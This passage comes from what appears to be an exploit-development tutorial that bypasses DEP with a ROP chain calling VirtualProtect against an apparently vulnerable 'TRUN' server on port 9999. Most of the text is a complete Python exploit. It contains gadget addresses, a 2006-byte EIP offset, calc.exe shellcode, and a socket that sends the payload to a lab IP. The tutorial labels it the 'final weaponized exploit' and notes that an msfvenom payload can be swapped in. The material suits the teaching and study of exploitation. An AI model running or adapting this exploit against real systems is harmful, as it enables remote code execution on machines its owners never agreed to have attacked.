rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

EAX gets “zeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The size parameter placeholder now holds the value of EAX, which is 0x300:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD it references (the flNewProtect placeholder) is overwritten with the value of EAX, which is 0x40! All of our parameters have successfully been added to the stack:

All that is left now is to jump back to the VirtualProtect call! But how will we do this?

Remember very early in this tutorial, when we saved the old stack pointer into ECX? We then performed some calculations on ECX to make it equal to the address of the first “parameter”, the return address. Recall that the return address slot sits four bytes above the slot that holds the pointer to VirtualProtect(). This means that if we decrement ECX by four bytes, it will contain the address of the slot holding the VirtualProtect() pointer.

However, in assembly, one of the best registers to make calculations in is EAX. Since we are done with the parameters, we will move the value of ECX into EAX. We will then decrement EAX by four bytes. Then, we will exchange the EAX register (which now holds the address of the VirtualProtect() pointer) with ESP. At this point, ESP will point at the VirtualProtect() pointer. Since the exchange instruction will be a part of a ROP gadget, the ret at the end of the gadget will pop that pointer off the new stack into EIP, thus executing the call to VirtualProtect() with all of the correct parameters on the stack!
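Here is a minimal sketch of that pivot using a toy register and memory model. BASE and the starting ESP are made-up stack addresses, and the Python statements only stand in for the gadgets; the VirtualProtect() address is the one listed in the POC.

```python
# Toy model of the final pivot back to the VirtualProtect() pointer.
BASE = 0x00b7f9c8                   # hypothetical address of the return address slot (held in ECX)
VIRTUALPROTECT = 0x77e22e15         # kernel32.VirtualProtect() as listed in the POC
mem = {
    BASE - 4: VIRTUALPROTECT,       # slot holding the VirtualProtect() pointer
    BASE: 0x4c4c4c4c,               # return address slot (placeholder value shown for clarity)
}
regs = {'ecx': BASE, 'eax': 0, 'esp': 0x00b7fb00, 'eip': 0}

regs['eax'] = regs['ecx']           # mov eax, ecx ; ret
for _ in range(2):                  # dec eax ; dec eax ; ret, used twice (4 bytes total)
    regs['eax'] -= 2
regs['eax'], regs['esp'] = regs['esp'], regs['eax']    # xchg eax, esp
regs['eip'] = mem[regs['esp']]      # the gadget's ret pops [ESP] into EIP...
regs['esp'] += 4                    # ...and leaves ESP on the return address slot

print(hex(regs['eip']), hex(regs['esp']))
```

When VirtualProtect() starts executing, ESP sits on the return address slot with the four parameters directly above it, which is the same stack layout a normal call would have produced.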

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPs right before the shellcode. We only added 0x100 bytes to the saved stack pointer to reach our shellcode. We have added a lot of ROP gadgets since then, so our shellcode is no longer located within 0x100 bytes of that saved stack pointer.

There is a simple solution to this: we will make the address of return and lpAddress 0x100 bytes greater.

This will be changed at this part of the POC:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---

We will update it to the following, to make it 0x100 bytes greater, and land around our shellcode:

---
# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
---
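A rough way to sanity check this offset is to add up the buffer lengths. The sketch below assumes the saved stack pointer in EAX is the address of the second DWORD of rop (which is what the "increase ECX 0xC bytes" comment in the POC implies), and it uses the 85 DWORDs of rop2 from the updated POC above; landing_region is a hypothetical helper, and the pivot gadgets appended later are not counted.

```python
DWORD = 4
ROP_LEN = 3 * DWORD        # three gadgets in `rop`
PARAMS_LEN = 6 * DWORD     # VirtualProtect pointer, return address, four parameters
PADDING_LEN = 4            # padding = "\x90" * 4
PADDING2_LEN = 250         # padding2 = "\x90" * 250

def landing_region(rop2_dwords, add_gadgets):
    """Report which buffer EAX points into, measured from the start of `rop`."""
    rop2_start = ROP_LEN + PARAMS_LEN + PADDING_LEN
    rop2_end = rop2_start + rop2_dwords * DWORD
    target = DWORD + add_gadgets * 0x100   # saved ESP is assumed to be the second rop DWORD
    if target < rop2_start:
        return 'rop/parameters'
    if target < rop2_end:
        return 'rop2'
    if target < rop2_end + PADDING2_LEN:
        return 'padding2'
    return 'shellcode or later'

print(landing_region(85, 1))   # one add eax, 0x100 against the updated POC
print(landing_region(87, 2))   # two add eax, 0x100 (rop2 grows by the extra gadget and its padding)
```

Under these assumptions a single add eax, 0x00000100 lands in the middle of the ROP gadgets, while two of them land in the NOPs that lead into the shellcode. The few extra gadgets for the final pivot make rop2 slightly longer, so confirm the real landing spot in the debugger.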

ROP gadgets for moving ECX into EAX, decrementing EAX, and exchanging EAX with ESP (the dec eax ; dec eax gadget subtracts two, so it is used twice to subtract four):

0x77e4a5e6: mov eax, ecx ; ret  ; kernel32.dll
0x41ac863b: dec eax ; dec eax ; ret  ;  WS2_32.dll
0x77d6fa6a: xchg eax, esp ; ret  ;  ntdll.dll

After all of the changes have been made, this is the final weaponized exploit:

import struct
import sys
import os


import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after the VirtualProtect call). Not officially a part of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Now we need to return to where the VirtualProtect call is on the stack.
# ECX still contains a value near the old stack pointer (saved at the beginning). Put ECX into EAX
# and decrement EAX to get back to the function call, and then load EAX into ESP.
# This restores the old stack pointer.
rop2 += struct.pack ('<L', 0x77e4a5e6)   # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41ac863b)   # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41ac863b)  # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77d6fa6a)   # 0x77d6fa6a: xchg eax, esp ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload that calls the C runtime system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# Filler to bring the total buffer to 5000 bytes
filler = "\x43" * (5000-len(command)-len(crash)-len(rop)-len(parameters)-len(padding)-len(rop2)-len(padding2)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()
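
As a sanity check on the flNewProtect portion of the script above, here is a minimal sketch of the arithmetic behind the long run of `add eax, 0x02` gadgets. It is written for Python 3 (the script above is Python 2), and the `repeat_gadget` helper is a hypothetical name introduced only for this illustration. The gadget address is copied from the chain; everything else is an assumption for demonstration purposes.

```python
import struct

ADD_EAX_2 = 0x77bd6b18            # add eax, 0x02 ; ret (address copied from the chain above)
PAGE_EXECUTE_READWRITE = 0x40     # the flNewProtect value the chain is building


def repeat_gadget(address, count):
    """Hypothetical helper: `count` little-endian copies of a 32-bit gadget address."""
    return struct.pack('<L', address) * count


# xor eax, eax leaves EAX at 0 and each gadget adds 2,
# so reaching 0x40 takes 0x40 // 2 gadgets.
count = PAGE_EXECUTE_READWRITE // 2
chain_fragment = repeat_gadget(ADD_EAX_2, count)

# Emulate the net effect on EAX to confirm the arithmetic.
eax = 0
for _ in range(count):
    eax = (eax + 2) & 0xFFFFFFFF

print(count, hex(eax), len(chain_fragment))
```

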